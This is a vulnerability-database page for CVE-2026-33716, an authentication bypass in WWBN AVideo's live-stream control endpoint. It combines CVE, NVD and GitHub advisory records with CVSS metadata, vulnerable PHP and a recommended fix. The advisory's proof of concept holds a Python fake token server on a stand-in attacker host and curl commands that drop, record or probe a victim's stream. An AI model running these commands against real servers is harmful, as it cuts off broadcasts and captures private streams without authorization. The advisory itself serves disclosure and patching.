Vulnerability-Lookup

CVE-2026-33716 (GCVE-0-2026-33716)

Vulnerability from cvelistv5 – Published: 2026-03-23 18:46 – Updated: 2026-03-24 14:25

Title

AVideo Allows Unauthenticated Live Stream Control via Token Verification URL Override in control.json.php

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the standalone live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` accepts a user-supplied `streamerURL` parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns `{"error": false}`, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence. Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contains a patch.

Severity ?

9.4 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

CWE

CWE-287 - Improper Authentication

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/388fcd57dbd…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33716",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T14:25:16.547362Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T14:25:27.605Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the standalone live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` accepts a user-supplied `streamerURL` parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns `{\"error\": false}`, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence. Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-287",
              "description": "CWE-287: Improper Authentication",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T18:46:47.412Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128"
        }
      ],
      "source": {
        "advisory": "GHSA-9hv9-gvwm-95f2",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo Allows Unauthenticated Live Stream Control via Token Verification URL Override in control.json.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33716",
    "datePublished": "2026-03-23T18:46:47.412Z",
    "dateReserved": "2026-03-23T17:06:05.748Z",
    "dateUpdated": "2026-03-24T14:25:27.605Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33716",
      "date": "2026-04-14",
      "epss": "0.00093",
      "percentile": "0.26075"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33716\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T19:16:42.323\",\"lastModified\":\"2026-03-25T15:05:05.063\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the standalone live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` accepts a user-supplied `streamerURL` parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns `{\\\"error\\\": false}`, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence. Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contains a patch.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el endpoint de control de transmisi\u00f3n en vivo independiente en \u0027plugin/Live/standAloneFiles/control.json.php\u0027 acepta un par\u00e1metro \u0027streamerURL\u0027 proporcionado por el usuario que anula d\u00f3nde el servidor env\u00eda las solicitudes de verificaci\u00f3n de token. Un atacante puede redirigir la verificaci\u00f3n de token a un servidor que controlan que siempre devuelve \u0027{\\\"error\\\": false}\u0027, eludiendo completamente la autenticaci\u00f3n. Esto otorga control no autenticado sobre cualquier transmisi\u00f3n en vivo en la plataforma, incluyendo la desconexi\u00f3n de publicadores activos, el inicio/parada de grabaciones y la sondeo de la existencia de transmisiones. El commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H\",\"baseScore\":9.4,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33716\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T14:25:16.547362Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T14:25:22.703Z\"}}], \"cna\": {\"title\": \"AVideo Allows Unauthenticated Live Stream Control via Token Verification URL Override in control.json.php\", \"source\": {\"advisory\": \"GHSA-9hv9-gvwm-95f2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128\", \"name\": \"https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the standalone live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` accepts a user-supplied `streamerURL` parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns `{\\\"error\\\": false}`, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence. Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-23T18:46:47.412Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33716\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T14:25:27.605Z\", \"dateReserved\": \"2026-03-23T17:06:05.748Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-23T18:46:47.412Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33716

Vulnerability from fkie_nvd - Published: 2026-03-23 19:16 - Updated: 2026-03-25 15:05

Severity ?

9.4 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128	Patch
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the standalone live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` accepts a user-supplied `streamerURL` parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns `{\"error\": false}`, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence. Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contains a patch."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el endpoint de control de transmisi\u00f3n en vivo independiente en \u0027plugin/Live/standAloneFiles/control.json.php\u0027 acepta un par\u00e1metro \u0027streamerURL\u0027 proporcionado por el usuario que anula d\u00f3nde el servidor env\u00eda las solicitudes de verificaci\u00f3n de token. Un atacante puede redirigir la verificaci\u00f3n de token a un servidor que controlan que siempre devuelve \u0027{\"error\": false}\u0027, eludiendo completamente la autenticaci\u00f3n. Esto otorga control no autenticado sobre cualquier transmisi\u00f3n en vivo en la plataforma, incluyendo la desconexi\u00f3n de publicadores activos, el inicio/parada de grabaciones y la sondeo de la existencia de transmisiones. El commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contiene un parche."
    }
  ],
  "id": "CVE-2026-33716",
  "lastModified": "2026-03-25T15:05:05.063",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.4,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "LOW",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-23T19:16:42.323",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-9HV9-GVWM-95F2

Vulnerability from github – Published: 2026-03-25 21:28 – Updated: 2026-03-25 21:28

Summary

AVideo Allows Unauthenticated Live Stream Control via Token Verification URL Override in control.json.php

Details

Summary

The standalone live stream control endpoint at plugin/Live/standAloneFiles/control.json.php accepts a user-supplied streamerURL parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns {"error": false}, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence.

Details

The vulnerability exists because the streamerURL parameter is accepted directly from user input with no validation:

plugin/Live/standAloneFiles/control.json.php:77-79 — User input overrides server config:

if (!empty($_REQUEST['streamerURL'])) {
    $streamerURL = $_REQUEST['streamerURL'];
}

plugin/Live/standAloneFiles/control.json.php:83-91 — The user-controlled value is assigned to the request object:

$obj->streamerURL = $streamerURL;

plugin/Live/standAloneFiles/control.json.php:115-126 — Token verification is sent to the attacker-controlled URL:

$verifyTokenURL = "{$obj->streamerURL}plugin/Live/verifyToken.json.php?token={$obj->token}";
// ...
$content = file_get_contents($verifyTokenURL, false, stream_context_create($arrContextOptions));

The legitimate verifyToken.json.php performs cryptographic token validation via Live::decryptHash() and checks token expiry (12-hour window). By redirecting verification to an attacker server, all of this is bypassed — the attacker's server simply responds with {"error": false}.

After authentication is bypassed, the attacker can execute any of the four supported commands (lines 150-186): record_start, record_stop, drop_publisher, and is_recording, which issue control commands to the local NGINX RTMP control module.

SSL verification is also explicitly disabled (lines 119-124), meaning the SSRF request will follow any attacker URL without certificate validation.

Notably, the developers were aware of this exact attack pattern and fixed it in the sibling file standAloneFiles/saveDVR.json.php on 2026-03-19 with an explicit comment: "SECURITY: User-supplied webSiteRootURL is intentionally NOT accepted. Allowing it would enable SSRF." The same fix was not applied to control.json.php.

PoC

Step 1: Set up an attacker server that returns {"error": false} for all requests.

# Minimal Python server on attacker machine (attacker.example.com:8888)
python3 -c '
import http.server, json
class H(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type","application/json")
        self.end_headers()
        self.wfile.write(json.dumps({"error": False}).encode())
    def log_message(self, *a): pass
http.server.HTTPServer(("0.0.0.0", 8888), H).serve_forever()
'

Step 2: Drop a victim's live stream (kill their broadcast):

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=drop_publisher&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Expected response (authentication bypassed, command executed):

{"error":false,"msg":"","streamerURL":"http://attacker.example.com:8888/","token":"anything","command":"drop_publisher","app":"live","name":"VICTIM_STREAM_KEY","response":"","requestedURL":"http://localhost:8080/control/drop/publisher?app=live&name=VICTIM_STREAM_KEY"}

Step 3: Start unauthorized recording of a victim's stream:

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=record_start&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Step 4: Probe whether a stream name is active:

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=is_recording&name=GUESS_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Impact

Denial of Service on Live Streams: Any unauthenticated attacker can terminate any active live broadcast using drop_publisher, causing immediate disruption for streamers and viewers.
Unauthorized Recording: An attacker can start recording any live stream without authorization using record_start, potentially capturing private or sensitive content.
Stream Enumeration: The is_recording command allows probing for valid stream names.
SSRF: The server makes an outbound HTTP request to an attacker-controlled URL via file_get_contents(), which could be used to scan internal services or exfiltrate data via the request URL.
No authentication required: The entire attack is performed without any credentials.

Recommended Fix

Remove the streamerURL request parameter override entirely, matching the fix already applied in saveDVR.json.php. In plugin/Live/standAloneFiles/control.json.php, replace lines 77-79:

// BEFORE (vulnerable):
if (!empty($_REQUEST['streamerURL'])) {
    $streamerURL = $_REQUEST['streamerURL'];
}

// AFTER (fixed):
// SECURITY: User-supplied streamerURL is intentionally NOT accepted.
// Allowing it would enable authentication bypass and SSRF via file_get_contents
// on an attacker-controlled host. streamerURL MUST come from the configuration
// file or be hard-coded in this file above.
if (empty($streamerURL)) {
    error_log("control.json.php: streamerURL is not configured");
    die(json_encode(['error' => true, 'msg' => 'Server not configured']));
}

Severity ?

9.4 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33716"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T21:28:21Z",
    "nvd_published_at": "2026-03-23T19:16:42Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe standalone live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` accepts a user-supplied `streamerURL` parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns `{\"error\": false}`, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence.\n\n## Details\n\nThe vulnerability exists because the `streamerURL` parameter is accepted directly from user input with no validation:\n\n**`plugin/Live/standAloneFiles/control.json.php:77-79`** \u2014 User input overrides server config:\n```php\nif (!empty($_REQUEST[\u0027streamerURL\u0027])) {\n    $streamerURL = $_REQUEST[\u0027streamerURL\u0027];\n}\n```\n\n**`plugin/Live/standAloneFiles/control.json.php:83-91`** \u2014 The user-controlled value is assigned to the request object:\n```php\n$obj-\u003estreamerURL = $streamerURL;\n```\n\n**`plugin/Live/standAloneFiles/control.json.php:115-126`** \u2014 Token verification is sent to the attacker-controlled URL:\n```php\n$verifyTokenURL = \"{$obj-\u003estreamerURL}plugin/Live/verifyToken.json.php?token={$obj-\u003etoken}\";\n// ...\n$content = file_get_contents($verifyTokenURL, false, stream_context_create($arrContextOptions));\n```\n\nThe legitimate `verifyToken.json.php` performs cryptographic token validation via `Live::decryptHash()` and checks token expiry (12-hour window). By redirecting verification to an attacker server, all of this is bypassed \u2014 the attacker\u0027s server simply responds with `{\"error\": false}`.\n\nAfter authentication is bypassed, the attacker can execute any of the four supported commands (lines 150-186): `record_start`, `record_stop`, `drop_publisher`, and `is_recording`, which issue control commands to the local NGINX RTMP control module.\n\nSSL verification is also explicitly disabled (lines 119-124), meaning the SSRF request will follow any attacker URL without certificate validation.\n\nNotably, the developers were aware of this exact attack pattern and fixed it in the sibling file `standAloneFiles/saveDVR.json.php` on 2026-03-19 with an explicit comment: *\"SECURITY: User-supplied webSiteRootURL is intentionally NOT accepted. Allowing it would enable SSRF.\"* The same fix was not applied to `control.json.php`.\n\n## PoC\n\n**Step 1:** Set up an attacker server that returns `{\"error\": false}` for all requests.\n\n```bash\n# Minimal Python server on attacker machine (attacker.example.com:8888)\npython3 -c \u0027\nimport http.server, json\nclass H(http.server.BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(200)\n        self.send_header(\"Content-Type\",\"application/json\")\n        self.end_headers()\n        self.wfile.write(json.dumps({\"error\": False}).encode())\n    def log_message(self, *a): pass\nhttp.server.HTTPServer((\"0.0.0.0\", 8888), H).serve_forever()\n\u0027\n```\n\n**Step 2:** Drop a victim\u0027s live stream (kill their broadcast):\n\n```bash\ncurl -s \"https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything\u0026command=drop_publisher\u0026name=VICTIM_STREAM_KEY\u0026app=live\u0026streamerURL=http://attacker.example.com:8888/\"\n```\n\nExpected response (authentication bypassed, command executed):\n```json\n{\"error\":false,\"msg\":\"\",\"streamerURL\":\"http://attacker.example.com:8888/\",\"token\":\"anything\",\"command\":\"drop_publisher\",\"app\":\"live\",\"name\":\"VICTIM_STREAM_KEY\",\"response\":\"\",\"requestedURL\":\"http://localhost:8080/control/drop/publisher?app=live\u0026name=VICTIM_STREAM_KEY\"}\n```\n\n**Step 3:** Start unauthorized recording of a victim\u0027s stream:\n\n```bash\ncurl -s \"https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything\u0026command=record_start\u0026name=VICTIM_STREAM_KEY\u0026app=live\u0026streamerURL=http://attacker.example.com:8888/\"\n```\n\n**Step 4:** Probe whether a stream name is active:\n\n```bash\ncurl -s \"https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything\u0026command=is_recording\u0026name=GUESS_STREAM_KEY\u0026app=live\u0026streamerURL=http://attacker.example.com:8888/\"\n```\n\n## Impact\n\n- **Denial of Service on Live Streams:** Any unauthenticated attacker can terminate any active live broadcast using `drop_publisher`, causing immediate disruption for streamers and viewers.\n- **Unauthorized Recording:** An attacker can start recording any live stream without authorization using `record_start`, potentially capturing private or sensitive content.\n- **Stream Enumeration:** The `is_recording` command allows probing for valid stream names.\n- **SSRF:** The server makes an outbound HTTP request to an attacker-controlled URL via `file_get_contents()`, which could be used to scan internal services or exfiltrate data via the request URL.\n- **No authentication required:** The entire attack is performed without any credentials.\n\n## Recommended Fix\n\nRemove the `streamerURL` request parameter override entirely, matching the fix already applied in `saveDVR.json.php`. In `plugin/Live/standAloneFiles/control.json.php`, replace lines 77-79:\n\n```php\n// BEFORE (vulnerable):\nif (!empty($_REQUEST[\u0027streamerURL\u0027])) {\n    $streamerURL = $_REQUEST[\u0027streamerURL\u0027];\n}\n\n// AFTER (fixed):\n// SECURITY: User-supplied streamerURL is intentionally NOT accepted.\n// Allowing it would enable authentication bypass and SSRF via file_get_contents\n// on an attacker-controlled host. streamerURL MUST come from the configuration\n// file or be hard-coded in this file above.\nif (empty($streamerURL)) {\n    error_log(\"control.json.php: streamerURL is not configured\");\n    die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Server not configured\u0027]));\n}\n```",
  "id": "GHSA-9hv9-gvwm-95f2",
  "modified": "2026-03-25T21:28:21Z",
  "published": "2026-03-25T21:28:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33716"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo Allows Unauthenticated Live Stream Control via Token Verification URL Override in control.json.php"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33716 (GCVE-0-2026-33716)

FKIE_CVE-2026-33716

GHSA-9HV9-GVWM-95F2

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature